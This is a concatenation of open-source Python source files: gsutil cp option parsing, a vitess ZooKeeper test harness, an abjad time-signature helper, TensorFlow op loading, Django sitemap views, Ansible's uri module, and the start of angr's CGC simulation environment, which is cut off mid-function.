          test_callback_file = a
        elif o == '-I':
          read_args_from_stdin = True
        elif o == '-L':
          use_manifest = True
          self.manifest = Manifest(a)
        elif o == '-M':
          # Note that we signal to the cp command to perform a move (copy
          # followed by remove) and use directory-move naming rules by passing
          # the undocumented (for internal use) -M option when running the cp
          # command from mv.py.
          perform_mv = True
        elif o == '-n':
          no_clobber = True
        elif o == '-p':
          preserve_acl = True
        elif o == '-P':
          self.preserve_posix_attrs = True
          InitializeUserGroups()
        elif o == '-r' or o == '-R':
          self.recursion_requested = True
        elif o == '-s':
          dest_storage_class = NormalizeStorageClass(a)
        elif o == '-U':
          self.skip_unsupported_objects = True
        elif o == '-v':
          print_ver = True
        elif o == '-z':
          gzip_arg_exts = [x.strip() for x in a.split(',')]
        elif o == '-Z':
          gzip_arg_all = GZIP_ALL_FILES
    # Cross-flag validation.
    if preserve_acl and canned_acl:
      raise CommandException(
          'Specifying both the -p and -a options together is invalid.')
    if self.all_versions and self.parallel_operations:
      raise CommandException(
          'The gsutil -m option is not supported with the cp -A flag, to '
          'ensure that object version ordering is preserved. Please re-run '
          'the command without the -m option.')
    if gzip_arg_exts and gzip_arg_all:
      raise CommandException(
          'Specifying both the -z and -Z options together is invalid.')
    self.gzip_exts = gzip_arg_exts or gzip_arg_all
    return CreateCopyHelperOpts(
        perform_mv=perform_mv,
        no_clobber=no_clobber,
        daisy_chain=daisy_chain,
        read_args_from_stdin=read_args_from_stdin,
        print_ver=print_ver,
        use_manifest=use_manifest,
        preserve_acl=preserve_acl,
        canned_acl=canned_acl,
        skip_unsupported_objects=self.skip_unsupported_objects,
        test_callback_file=test_callback_file,
        dest_storage_class=dest_storage_class)
| apache-2.0 |
netroby/vitess | test/topo_flavor/zookeeper.py | 2 | 2788 | #!/usr/bin/env python
# Copyright 2014, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
import logging
import os
import json
import server
class ZkTopoServer(server.TopoServer):
  """Implementation of TopoServer for ZooKeeper.

  Spawns a test ZooKeeper instance via the zkctl binary and exposes
  setup/teardown/wipe lifecycle hooks plus the topology flags vitess test
  binaries need to talk to it.
  """

  def __init__(self):
    # Ports are reserved lazily (see assign_ports) so importing this module
    # has no side effects.
    self.ports_assigned = False

  def assign_ports(self):
    """Assign ports if not already assigned (idempotent)."""
    if self.ports_assigned:
      return
    # Imported here (not at module level) to avoid requiring the test
    # environment at import time.
    from environment import reserve_ports
    import utils
    # Three consecutive ports for the single-node ZK config string;
    # the last one (base + 2) is the client port.
    self.zk_port_base = reserve_ports(3)
    self.hostname = utils.hostname
    self.zk_ports = ':'.join(str(self.zk_port_base + i) for i in range(3))
    self.zk_client_port = self.zk_port_base + 2
    self.ports_assigned = True

  def setup(self, add_bad_host=False):
    """Starts ZooKeeper, writes the cell-map client config, and creates
    the /zk/<cell>/vt base paths.

    If add_bad_host is True, an unreachable host is appended to the
    'test_ca' cell address list (used to exercise failure handling).
    """
    from environment import run, binary_args, vtlogroot, tmproot
    self.assign_ports()
    run(binary_args('zkctl') + [
        '-log_dir', vtlogroot,
        '-zk.cfg', '1@%s:%s' % (self.hostname, self.zk_ports),
        'init'])
    config = tmproot + '/test-zk-client-conf.json'
    with open(config, 'w') as f:
      ca_server = 'localhost:%u' % (self.zk_client_port)
      if add_bad_host:
        ca_server += ',does.not.exists:1234'
      # All test cells (and the global cell) point at the same local ZK.
      zk_cell_mapping = {
          'test_nj': 'localhost:%u' % (self.zk_client_port),
          'test_ny': 'localhost:%u' % (self.zk_client_port),
          'test_ca': ca_server,
          'global': 'localhost:%u' % (self.zk_client_port),
      }
      json.dump(zk_cell_mapping, f)
    # Child processes discover the cell map through this env variable.
    os.environ['ZK_CLIENT_CONFIG'] = config
    logging.debug('Using ZK_CLIENT_CONFIG=%s', str(config))
    run(binary_args('zk') + ['touch', '-p', '/zk/test_nj/vt'])
    run(binary_args('zk') + ['touch', '-p', '/zk/test_ny/vt'])
    run(binary_args('zk') + ['touch', '-p', '/zk/test_ca/vt'])

  def teardown(self):
    """Stops the ZooKeeper instance ('shutdown' keeps logs, 'teardown'
    removes them, depending on the --keep-logs test option)."""
    from environment import run, binary_args, vtlogroot
    import utils
    self.assign_ports()
    run(binary_args('zkctl') + [
        '-log_dir', vtlogroot,
        '-zk.cfg', '1@%s:%s' % (self.hostname, self.zk_ports),
        'shutdown' if utils.options.keep_logs else 'teardown'],
        raise_on_error=False)

  def flags(self):
    """Returns the topology flags to pass to vitess binaries."""
    return ['-topo_implementation', 'zookeeper']

  def wipe(self):
    """Removes all test data under the /zk/<cell>/vt paths."""
    from environment import run, binary_args
    # Work around safety check on recursive delete.
    run(binary_args('zk') + ['rm', '-rf', '/zk/test_nj/vt/*'])
    run(binary_args('zk') + ['rm', '-rf', '/zk/test_ny/vt/*'])
    run(binary_args('zk') + ['rm', '-rf', '/zk/global/vt/*'])
    run(binary_args('zk') + ['rm', '-f', '/zk/test_nj/vt'])
    run(binary_args('zk') + ['rm', '-f', '/zk/test_ny/vt'])
    run(binary_args('zk') + ['rm', '-f', '/zk/global/vt'])


# Register this implementation under the 'zookeeper' topo flavor name.
server.flavor_map['zookeeper'] = ZkTopoServer()
| bsd-3-clause |
mscuthbert/abjad | abjad/tools/scoretools/set_measure_denominator_and_adjust_numerator.py | 2 | 1791 | # -*- encoding: utf-8 -*-
from abjad.tools import indicatortools
from abjad.tools import durationtools
from abjad.tools import mathtools
from abjad.tools.topleveltools import attach
from abjad.tools.topleveltools import detach
# TODO: implement scoretools.set_measure_denominator_and_adjust_contents().
def set_measure_denominator_and_adjust_numerator(measure, denominator):
    r'''Set `measure` time signature `denominator` and multiply time signature
    numerator accordingly:

    ::

        >>> measure = Measure((3, 8), "c'8 d'8 e'8")
        >>> beam = spannertools.Beam()
        >>> attach(beam, measure.select_leaves())

    .. doctest::

        >>> print(format(measure))
        {
            \time 3/8
            c'8 [
            d'8
            e'8 ]
        }

    ::

        >>> scoretools.set_measure_denominator_and_adjust_numerator(measure, 16)
        Measure((6, 16), "c'8 d'8 e'8")

    .. doctest::

        >>> print(format(measure))
        {
            \time 6/16
            c'8 [
            d'8
            e'8 ]
        }

    Leave `measure` contents unchanged.

    Return `measure`.
    '''
    # Imported locally to avoid a circular import with scoretools.
    from abjad.tools import scoretools
    # Non-Measure inputs pass through unchanged.
    if isinstance(measure, scoretools.Measure):
        # to allow iteration inside zero-update loop
        old_time_signature = measure.time_signature
        old_time_signature_pair = (
            old_time_signature.numerator, old_time_signature.denominator)
        # NonreducedFraction preserves the unreduced numerator/denominator
        # pair while rescaling to the requested denominator (e.g. 3/8 with
        # denominator 16 becomes 6/16, not 3/8).
        new_time_signature = mathtools.NonreducedFraction(old_time_signature_pair)
        new_time_signature = new_time_signature.with_denominator(denominator)
        new_time_signature = indicatortools.TimeSignature(new_time_signature)
        # Replace the attached time signature indicator in place.
        detach(indicatortools.TimeSignature, measure)
        attach(new_time_signature, measure)
    return measure
| gpl-3.0 |
cg31/tensorflow | tensorflow/contrib/tensor_forest/python/ops/inference_ops.py | 15 | 2143 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for BrainTree v2 tree evaluation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import load_library
from tensorflow.python.framework import ops
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
# Name of the shared object containing the compiled inference kernels,
# resolved relative to this package's data files (see Load() below).
INFERENCE_OPS_FILE = '_inference_ops.so'

# Lazily loaded op-library module; all access is guarded by _ops_lock.
_inference_ops = None
_ops_lock = threading.Lock()

# TODO(b/31222613): This op may be differentiable, and there may be
# latent bugs here.
ops.NotDifferentiable('TreePredictions')

# Shape inference is delegated to the C++ kernel's shape function.
ops.RegisterShape('TreePredictions')(common_shapes.call_cpp_shape_fn)

# Workaround for the fact that importing tensorflow imports contrib
# (even if a user isn't using this or any other contrib op), but
# there's not yet any guarantee that the shared object exists.
# In which case, "import tensorflow" will always crash, even for users that
# never use contrib.
def Load():
  """Lazily load the inference ops library, returning the loaded module.

  Thread-safe: the first caller loads the shared object under _ops_lock;
  subsequent callers get the cached module.
  """
  global _inference_ops
  with _ops_lock:
    if _inference_ops is None:
      so_path = resource_loader.get_path_to_datafile(INFERENCE_OPS_FILE)
      logging.info('data path: %s', so_path)
      loaded = load_library.load_op_library(so_path)
      assert loaded, 'Could not load inference_ops.so'
      _inference_ops = loaded
  return _inference_ops
| apache-2.0 |
CubicERP/geraldo | site/newsite/site-geraldo/django/contrib/sitemaps/views.py | 55 | 1891 | from django.http import HttpResponse, Http404
from django.template import loader
from django.contrib.sites.models import Site
from django.core import urlresolvers
from django.utils.encoding import smart_str
from django.core.paginator import EmptyPage, PageNotAnInteger
def index(request, sitemaps):
    """Render the sitemap index: one URL per sitemap section, plus one URL
    per additional paginated page of each section.

    :param request: the current HttpRequest (used to pick http vs https)
    :param sitemaps: mapping of section name -> Sitemap instance or class
    :returns: HttpResponse with the rendered ``sitemap_index.xml``
    """
    current_site = Site.objects.get_current()
    protocol = 'https' if request.is_secure() else 'http'
    sites = []
    for section, site in sitemaps.items():
        # Sections may be registered as classes; instantiate on demand.
        if callable(site):
            site = site()
        pages = site.paginator.num_pages
        sitemap_url = urlresolvers.reverse('django.contrib.sitemaps.views.sitemap', kwargs={'section': section})
        sites.append('%s://%s%s' % (protocol, current_site.domain, sitemap_url))
        # Pages beyond the first are addressed via the ?p= query parameter.
        # (range(2, 2) is empty, so single-page sections add nothing here.)
        for page in range(2, pages + 1):
            sites.append('%s://%s%s?p=%s' % (protocol, current_site.domain, sitemap_url, page))
    xml = loader.render_to_string('sitemap_index.xml', {'sitemaps': sites})
    return HttpResponse(xml, mimetype='application/xml')
def sitemap(request, sitemaps, section=None):
    """Render the sitemap for a single section, or for all sections.

    Raises Http404 for an unknown section, an empty page, or a
    non-integer ``p`` query parameter.
    """
    if section is None:
        maps = sitemaps.values()
    else:
        if section not in sitemaps:
            raise Http404("No sitemap available for section: %r" % section)
        maps = [sitemaps[section]]
    page = request.GET.get("p", 1)

    urls = []
    for site in maps:
        try:
            # Sections may be registered as classes; instantiate on demand.
            source = site() if callable(site) else site
            urls.extend(source.get_urls(page))
        except EmptyPage:
            raise Http404("Page %s empty" % page)
        except PageNotAnInteger:
            raise Http404("No page '%s'" % page)
    xml = smart_str(loader.render_to_string('sitemap.xml', {'urlset': urls}))
    return HttpResponse(xml, mimetype='application/xml')
| lgpl-3.0 |
Tiger66639/ansible-modules-core | network/basics/uri.py | 14 | 19263 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Romeo Theriault <romeot () hawaii.edu>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# see examples/playbooks/uri.yml
import cgi
import shutil
import tempfile
import base64
import datetime
try:
import json
except ImportError:
import simplejson as json
DOCUMENTATION = '''
---
module: uri
short_description: Interacts with webservices
description:
- Interacts with HTTP and HTTPS web services and supports Digest, Basic and WSSE
HTTP authentication mechanisms.
version_added: "1.1"
options:
url:
description:
- HTTP or HTTPS URL in the form (http|https)://host.domain[:port]/path
required: true
default: null
aliases: []
dest:
description:
- path of where to download the file to (if desired). If I(dest) is a directory, the basename of the file on the remote server will be used.
required: false
default: null
user:
description:
- username for the module to use for Digest, Basic or WSSE authentication.
required: false
default: null
password:
description:
- password for the module to use for Digest, Basic or WSSE authentication.
required: false
default: null
body:
description:
- The body of the http request/response to the web service.
required: false
default: null
body_format:
description:
- The serialization format of the body. When set to json, encodes the body argument and automatically sets the Content-Type header accordingly.
required: false
choices: [ "raw", "json" ]
default: raw
method:
description:
- The HTTP method of the request or response.
required: false
choices: [ "GET", "POST", "PUT", "HEAD", "DELETE", "OPTIONS", "PATCH", "TRACE", "CONNECT", "REFRESH" ]
default: "GET"
return_content:
description:
- Whether or not to return the body of the request as a "content" key in the dictionary result. If the reported Content-type is "application/json", then the JSON is additionally loaded into a key called C(json) in the dictionary results.
required: false
choices: [ "yes", "no" ]
default: "no"
force_basic_auth:
description:
- httplib2, the library used by the uri module only sends authentication information when a webservice
responds to an initial request with a 401 status. Since some basic auth services do not properly
send a 401, logins will fail. This option forces the sending of the Basic authentication header
upon initial request.
required: false
choices: [ "yes", "no" ]
default: "no"
follow_redirects:
description:
- Whether or not the URI module should follow redirects. C(all) will follow all redirects.
C(safe) will follow only "safe" redirects, where "safe" means that the client is only
doing a GET or HEAD on the URI to which it is being redirected. C(none) will not follow
any redirects. Note that C(yes) and C(no) choices are accepted for backwards compatibility,
where C(yes) is the equivalent of C(all) and C(no) is the equivalent of C(safe). C(yes) and C(no)
are deprecated and will be removed in some future version of Ansible.
required: false
choices: [ "all", "safe", "none" ]
default: "safe"
creates:
description:
- a filename, when it already exists, this step will not be run.
required: false
removes:
description:
- a filename, when it does not exist, this step will not be run.
required: false
status_code:
description:
- A valid, numeric, HTTP status code that signifies success of the request. Can also be comma separated list of status codes.
required: false
default: 200
timeout:
description:
- The socket level timeout in seconds
required: false
default: 30
HEADER_:
description:
- Any parameter starting with "HEADER_" is a sent with your request as a header.
For example, HEADER_Content-Type="application/json" would send the header
"Content-Type" along with your request with a value of "application/json".
required: false
default: null
others:
description:
- all arguments accepted by the M(file) module also work here
required: false
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only
set to C(no) used on personally controlled sites using self-signed
certificates. Prior to 1.9.2 the code defaulted to C(no).
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: '1.9.2'
# informational: requirements for nodes
requirements: [ urlparse, httplib2 ]
author: "Romeo Theriault (@romeotheriault)"
'''
EXAMPLES = '''
# Check that you can connect (GET) to a page and it returns a status 200
- uri: url=http://www.example.com
# Check that a page returns a status 200 and fail if the word AWESOME is not in the page contents.
- action: uri url=http://www.example.com return_content=yes
register: webpage
- action: fail
when: "'AWESOME' not in webpage.content"
# Create a JIRA issue
- uri:
url: https://your.jira.example.com/rest/api/2/issue/
method: POST
user: your_username
password: your_pass
body: "{{ lookup('file','issue.json') }}"
force_basic_auth: yes
status_code: 201
body_format: json
# Login to a form based webpage, then use the returned cookie to
# access the app in later tasks
- uri:
url: https://your.form.based.auth.example.com/index.php
method: POST
body: "name=your_username&password=your_password&enter=Sign%20in"
status_code: 302
HEADER_Content-Type: "application/x-www-form-urlencoded"
register: login
- uri:
url: https://your.form.based.auth.example.com/dashboard.php
method: GET
return_content: yes
HEADER_Cookie: "{{login.set_cookie}}"
# Queue build of a project in Jenkins:
- uri:
url: "http://{{ jenkins.host }}/job/{{ jenkins.job }}/build?token={{ jenkins.token }}"
method: GET
user: "{{ jenkins.user }}"
password: "{{ jenkins.password }}"
force_basic_auth: yes
status_code: 201
'''
HAS_HTTPLIB2 = True
try:
import httplib2
except ImportError:
HAS_HTTPLIB2 = False
HAS_URLPARSE = True
try:
import urlparse
import socket
except ImportError:
HAS_URLPARSE = False
def write_file(module, url, dest, content):
    """Write *content* to *dest*, touching *dest* only when it would change.

    The body is staged in a temporary file, checksummed with SHA1 and copied
    over *dest* only if the destination is missing or differs, keeping the
    operation idempotent.  Every failure path removes the temporary file and
    exits via module.fail_json().

    :param module: AnsibleModule instance (checksums, error reporting)
    :param url: requested URL (kept for interface compatibility; unused)
    :param dest: destination path on the managed host
    :param content: raw response body to persist
    """
    # Stage the content in a temporary file.  Reuse the descriptor returned
    # by mkstemp instead of opening the path a second time (the previous
    # version leaked that fd).
    fd, tmpsrc = tempfile.mkstemp()
    f = os.fdopen(fd, 'wb')
    try:
        f.write(content)
    except Exception as err:
        f.close()
        os.remove(tmpsrc)
        module.fail_json(msg="failed to create temporary content file: %s" % str(err))
    f.close()

    checksum_src = None
    checksum_dest = None

    # Sanity-check the staged file.  (Do not os.remove() a path that just
    # failed the existence check -- that would raise instead of failing
    # cleanly through fail_json.)
    if not os.path.exists(tmpsrc):
        module.fail_json(msg="Source %s does not exist" % (tmpsrc))
    if not os.access(tmpsrc, os.R_OK):
        os.remove(tmpsrc)
        module.fail_json(msg="Source %s not readable" % (tmpsrc))
    checksum_src = module.sha1(tmpsrc)

    # Check permissions on the destination (or its directory if absent).
    if os.path.exists(dest):
        if not os.access(dest, os.W_OK):
            os.remove(tmpsrc)
            module.fail_json(msg="Destination %s not writable" % (dest))
        if not os.access(dest, os.R_OK):
            os.remove(tmpsrc)
            module.fail_json(msg="Destination %s not readable" % (dest))
        checksum_dest = module.sha1(dest)
    else:
        if not os.access(os.path.dirname(dest), os.W_OK):
            os.remove(tmpsrc)
            module.fail_json(msg="Destination dir %s not writable" % (os.path.dirname(dest)))

    # Only copy when the content actually differs.
    if checksum_src != checksum_dest:
        try:
            shutil.copyfile(tmpsrc, dest)
        except Exception as err:
            os.remove(tmpsrc)
            module.fail_json(msg="failed to copy %s to %s: %s" % (tmpsrc, dest, str(err)))
    os.remove(tmpsrc)
def url_filename(url):
    """Derive a destination filename from *url*'s path component.

    Falls back to 'index.html' when the path has no basename, e.g. when the
    URL ends in a slash or carries no path at all.
    """
    path = urlparse.urlsplit(url)[2]
    basename = os.path.basename(path)
    return basename if basename else 'index.html'
def uri(module, url, dest, user, password, body, body_format, method, headers, redirects, socket_timeout, validate_certs):
    """Perform the HTTP(S) request and return ``(response_dict, content, dest)``.

    Translates the module's ``follow_redirects`` choice into httplib2
    settings, resolves a directory *dest* into a concrete filename (probing
    one redirect to discover it), and maps every httplib2/socket failure
    onto module.fail_json().
    """
    # To debug:
    #httplib2.debuglevel = 4

    # Map the redirect policy onto httplib2's two flags:
    # 'all'/'yes' -> follow everything; 'none' -> follow nothing;
    # default ('safe'/'no') -> follow only GET/HEAD redirects.
    if redirects == "all" or redirects == "yes":
        follow_redirects = True
        follow_all_redirects = True
    elif redirects == "none":
        follow_redirects = False
        follow_all_redirects = False
    else:
        follow_redirects = True
        follow_all_redirects = False

    # Create a Http object and set some default options.
    disable_validation = not validate_certs
    h = httplib2.Http(disable_ssl_certificate_validation=disable_validation, timeout=socket_timeout)
    h.follow_all_redirects = follow_all_redirects
    h.follow_redirects = follow_redirects
    h.forward_authorization_headers = True

    # A username and a password must be given together.
    if user is not None and password is None:
        module.fail_json(msg="Both a username and password need to be set.")
    if password is not None and user is None:
        module.fail_json(msg="Both a username and password need to be set.")
    if user is not None and password is not None:
        h.add_credentials(user, password)

    # If dest is set and is a directory, check whether we get redirected and
    # derive the target filename from the (possibly redirected) url.
    redirected = False
    resp_redir = {}
    r = {}
    if dest is not None:
        dest = os.path.expanduser(dest)
        if os.path.isdir(dest):
            # first check if we are redirected to a file download
            h.follow_redirects = False
            # This probe is best-effort: any failure is ignored here and the
            # real request below will surface the error instead.
            try:
                resp_redir, content_redir = h.request(url, method=method, body=body, headers=headers)
            except Exception:
                pass
            # if we are redirected, update the url with the location header
            if 'status' in resp_redir and resp_redir['status'] in ["301", "302", "303", "307"]:
                url = resp_redir['location']
                redirected = True
            dest = os.path.join(dest, url_filename(url))
            # if the destination file already exists, only download if the
            # remote copy is newer
            if os.path.exists(dest):
                t = datetime.datetime.utcfromtimestamp(os.path.getmtime(dest))
                tstamp = t.strftime('%a, %d %b %Y %H:%M:%S +0000')
                headers['If-Modified-Since'] = tstamp
            # do safe redirects now, including 307
            h.follow_redirects = follow_redirects

    # Make the request, or try to :)
    try:
        resp, content = h.request(url, method=method, body=body, headers=headers)
        r['redirected'] = redirected
        r.update(resp_redir)
        r.update(resp)
        return r, content, dest
    except httplib2.RedirectMissingLocation:
        module.fail_json(msg="A 3xx redirect response code was provided but no Location: header was provided to point to the new location.")
    except httplib2.RedirectLimit:
        module.fail_json(msg="The maximum number of redirections was reached without coming to a final URI.")
    except httplib2.ServerNotFoundError:
        module.fail_json(msg="Unable to resolve the host name given.")
    except httplib2.RelativeURIError:
        module.fail_json(msg="A relative, as opposed to an absolute URI, was passed in.")
    except httplib2.FailedToDecompressContent:
        module.fail_json(msg="The headers claimed that the content of the response was compressed but the decompression algorithm applied to the content failed.")
    except httplib2.UnimplementedDigestAuthOptionError:
        module.fail_json(msg="The server requested a type of Digest authentication that we are unfamiliar with.")
    except httplib2.UnimplementedHmacDigestAuthOptionError:
        # NOTE: this handler previously appeared twice; the duplicate clause
        # was unreachable and has been removed.
        module.fail_json(msg="The server requested a type of HMACDigest authentication that we are unfamiliar with.")
    except httplib2.CertificateHostnameMismatch:
        module.fail_json(msg="The server's certificate does not match with its hostname.")
    except httplib2.SSLHandshakeError:
        module.fail_json(msg="Unable to validate server's certificate against available CA certs.")
    except socket.error as e:
        module.fail_json(msg="Socket error: %s to %s" % (e, url))
def main():
    """Module entry point: parse arguments, issue the request via uri(),
    optionally write the body to *dest*, and exit with a normalized
    response dictionary (header names with '-' mapped to '_')."""
    module = AnsibleModule(
        argument_spec = dict(
            url = dict(required=True),
            dest = dict(required=False, default=None),
            user = dict(required=False, default=None),
            password = dict(required=False, default=None),
            body = dict(required=False, default=None),
            body_format = dict(required=False, default='raw', choices=['raw', 'json']),
            method = dict(required=False, default='GET', choices=['GET', 'POST', 'PUT', 'HEAD', 'DELETE', 'OPTIONS', 'PATCH', 'TRACE', 'CONNECT', 'REFRESH']),
            return_content = dict(required=False, default='no', type='bool'),
            force_basic_auth = dict(required=False, default='no', type='bool'),
            follow_redirects = dict(required=False, default='safe', choices=['all', 'safe', 'none', 'yes', 'no']),
            creates = dict(required=False, default=None),
            removes = dict(required=False, default=None),
            status_code = dict(required=False, default=[200], type='list'),
            timeout = dict(required=False, default=30, type='int'),
        validate_certs = dict(required=False, default=True, type='bool'),
        ),
        # HEADER_* arguments are collected dynamically below, so unknown
        # arguments must be tolerated here.
        check_invalid_arguments=False,
        add_file_common_args=True
    )

    if not HAS_HTTPLIB2:
        module.fail_json(msg="httplib2 is not installed")
    if not HAS_URLPARSE:
        module.fail_json(msg="urlparse is not installed")

    url = module.params['url']
    user = module.params['user']
    password = module.params['password']
    body = module.params['body']
    body_format = module.params['body_format']
    method = module.params['method']
    dest = module.params['dest']
    return_content = module.params['return_content']
    force_basic_auth = module.params['force_basic_auth']
    redirects = module.params['follow_redirects']
    creates = module.params['creates']
    removes = module.params['removes']
    status_code = [int(x) for x in list(module.params['status_code'])]
    socket_timeout = module.params['timeout']
    validate_certs = module.params['validate_certs']

    dict_headers = {}

    # If body_format is json, encode the body (which can be a dict or a list)
    # and automatically set the Content-Type header
    if body_format == 'json':
        body = json.dumps(body)
        dict_headers['Content-Type'] = 'application/json'

    # Grab all the http headers. Need this hack since passing multi-values is currently a bit ugly. (e.g. headers='{"Content-Type":"application/json"}')
    for key, value in module.params.iteritems():
        if key.startswith("HEADER_"):
            skey = key.replace("HEADER_", "")
            dict_headers[skey] = value

    if creates is not None:
        # do not run the command if the line contains creates=filename
        # and the filename already exists. This allows idempotence
        # of uri executions.
        creates = os.path.expanduser(creates)
        if os.path.exists(creates):
            module.exit_json(stdout="skipped, since %s exists" % creates, changed=False, stderr=False, rc=0)

    if removes is not None:
        # do not run the command if the line contains removes=filename
        # and the filename does not exist. This allows idempotence
        # of uri executions.
        v = os.path.expanduser(removes)
        if not os.path.exists(removes):
            module.exit_json(stdout="skipped, since %s does not exist" % removes, changed=False, stderr=False, rc=0)

    # httplib2 only sends authentication after the server asks for it with a 401.
    # Some 'basic auth' services fail to send a 401 and require the authentication
    # up front. This creates the Basic authentication header and sends it immediately.
    if force_basic_auth:
        dict_headers["Authorization"] = "Basic {0}".format(base64.b64encode("{0}:{1}".format(user, password)))

    # Make the request
    resp, content, dest = uri(module, url, dest, user, password, body, body_format, method, dict_headers, redirects, socket_timeout, validate_certs)
    resp['status'] = int(resp['status'])

    # Write the file out if requested
    if dest is not None:
        if resp['status'] == 304:
            # 304 Not Modified: destination already up to date
            changed = False
        else:
            write_file(module, url, dest, content)
            # allow file attribute changes
            changed = True
            module.params['path'] = dest
            file_args = module.load_file_common_arguments(module.params)
            file_args['path'] = dest
            changed = module.set_fs_attributes_if_different(file_args, changed)
        resp['path'] = dest
    else:
        changed = False

    # Transmogrify the headers, replacing '-' with '_', since variables don't work with dashes.
    uresp = {}
    for key, value in resp.iteritems():
        ukey = key.replace("-", "_")
        uresp[ukey] = value

    # Default content_encoding to try
    content_encoding = 'utf-8'
    if 'content_type' in uresp:
        content_type, params = cgi.parse_header(uresp['content_type'])
        if 'charset' in params:
            content_encoding = params['charset']
        u_content = unicode(content, content_encoding, errors='xmlcharrefreplace')
        if content_type.startswith('application/json') or \
                content_type.startswith('text/json'):
            # best-effort JSON decode; a malformed body just omits the key
            try:
                js = json.loads(u_content)
                uresp['json'] = js
            except:
                pass
    else:
        u_content = unicode(content, content_encoding, errors='xmlcharrefreplace')

    if resp['status'] not in status_code:
        module.fail_json(msg="Status code was not " + str(status_code), content=u_content, **uresp)
    elif return_content:
        module.exit_json(changed=changed, content=u_content, **uresp)
    else:
        module.exit_json(changed=changed, **uresp)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
tyb0807/angr | angr/simos/cgc.py | 1 | 6180 |
import logging
import claripy
from cle import BackedCGC
from ..misc import IRange
from ..procedures import SIM_LIBRARIES as L
from ..state_plugins import SimActionData
from .. import sim_options as o
from .userland import SimUserland
_l = logging.getLogger('angr.simos.cgc')
class SimCGC(SimUserland):
    """
    Environment configuration for the CGC DECREE platform
    """

    def __init__(self, project, **kwargs):
        # DECREE syscalls resolve through the 'cgcabi' SimLibrary;
        # syscall_addr_alignment=1 means no special address alignment.
        super(SimCGC, self).__init__(project,
                                     syscall_library=L['cgcabi'],
                                     syscall_addr_alignment=1,
                                     name="CGC",
                                     **kwargs)

    # pylint: disable=arguments-differ
    def state_blank(self, flag_page=None, **kwargs):
        """
        Create a blank state with the CGC memory layout, plugins, and limits.

        :param flag_page: Flag page content, either a string or a list of BV8s
        """
        s = super(SimCGC, self).state_blank(**kwargs)  # pylint:disable=invalid-name

        # Special stack base for CGC binaries to work with Shellphish CRS
        s.regs.sp = 0xbaaaaffc

        # Map the special cgc memory
        if o.ABSTRACT_MEMORY not in s.options:
            # Pre-approve an 8 MB stack region ending at 0xbaaab000 and map
            # a 4 KB region at 0x4347c000 for the flag page.
            s.memory.mem._preapproved_stack = IRange(0xbaaab000 - 1024 * 1024 * 8, 0xbaaab000)
            s.memory.map_region(0x4347c000, 4096, 1)

        # Create the CGC plugin
        s.get_plugin('cgc')

        # Set up the flag page: default to 0x1000 eternal symbolic bytes,
        # or concretize a caller-provided bytestring; a list is used as-is.
        if flag_page is None:
            flag_page = [s.solver.BVS("cgc-flag-byte-%d" % i, 8, key=('flag', i), eternal=True) for i in xrange(0x1000)]
        elif type(flag_page) is bytes:
            flag_page = [s.solver.BVV(c) for c in flag_page]
        elif type(flag_page) is list:
            pass
        else:
            raise ValueError("Bad flag page: expected None, bytestring, or list, but got %s" % type(flag_page))

        s.cgc.flag_bytes = flag_page
        if s.mode != 'static':
            s.memory.store(0x4347c000, claripy.Concat(*s.cgc.flag_bytes), priv=True)

        # set up the address for concrete transmits
        s.unicorn.transmit_addr = self.syscall_from_number(2).addr

        # Limits consulted by SimProcedures operating on this state.
        s.libc.max_str_len = 1000000
        s.libc.max_strtol_len = 10
        s.libc.max_memcpy_size = 0x100000
        s.libc.max_symbolic_bytes = 100
        s.libc.max_buffer_size = 0x100000

        return s

    def state_entry(self, add_options=None, **kwargs):
        """
        Create an entry state.  For a BackedCGC main object, registers,
        allocation base, and previously recorded stdout writes are replayed
        from the backer; otherwise registers are set to the fixed CGC entry
        values.
        """
        if isinstance(self.project.loader.main_object, BackedCGC):
            kwargs['permissions_backer'] = (True, self.project.loader.main_object.permissions_map)
        if add_options is None:
            add_options = set()
        add_options.add(o.ZERO_FILL_UNCONSTRAINED_MEMORY)

        state = super(SimCGC, self).state_entry(add_options=add_options, **kwargs)

        if isinstance(self.project.loader.main_object, BackedCGC):
            # Translate the backer's register dump into state registers.
            for reg, val in self.project.loader.main_object.initial_register_values():
                if reg in state.arch.registers:
                    setattr(state.regs, reg, val)
                elif reg == 'eflags':
                    pass
                elif reg == 'fctrl':
                    # keep only bits 10-11 (x87 rounding control)
                    state.regs.fpround = (val & 0xC00) >> 10
                elif reg == 'fstat':
                    # keep the x87 condition-code bits C0-C3
                    state.regs.fc3210 = (val & 0x4700)
                elif reg == 'ftag':
                    # Expand the 2-bit-per-register tag word into per-register
                    # tag bytes: 0 for empty (tag bits == 3), 1 otherwise.
                    empty_bools = [((val >> (x * 2)) & 3) == 3 for x in xrange(8)]
                    tag_chars = [claripy.BVV(0 if x else 1, 8) for x in empty_bools]
                    for i, tag in enumerate(tag_chars):
                        setattr(state.regs, 'fpu_t%d' % i, tag)
                elif reg in ('fiseg', 'fioff', 'foseg', 'fooff', 'fop'):
                    pass
                elif reg == 'mxcsr':
                    # keep only the bits angr models as the SSE rounding mode
                    state.regs.sseround = (val & 0x600) >> 9
                else:
